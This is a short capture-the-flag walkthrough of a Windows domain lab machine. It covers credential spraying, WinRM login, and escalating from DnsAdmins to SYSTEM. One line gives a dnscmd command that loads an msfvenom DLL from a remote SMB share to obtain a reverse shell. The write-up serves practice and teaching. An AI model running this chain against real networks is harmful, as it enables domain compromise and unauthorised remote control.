Updated：November 3, 2021 pm
Run enum4linux script and find the usernames there, a username has a comment about a password, take all usernames and try against smbshare with that password, the username melanie with the password will work, now use winrm and connect and grab user.txt.
Now I find the user ryan has used as a parameter to cmd.exe and then I login as ryan. After that I see a note saying that dues to change freeze, any system changes will be automatically reverted within 1 minute.
I see the groups and there is a group
DnsAdmins. I had read this post
https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise . I create a dll using msfvenom, and then I use impacket-smbserver and then use
dnscmd 10.10.10.169 /config /serverlevelplugindll \\10.0.0.2\gis\dnsprivesc.dll and then stop and start the dns. And get reverse shell.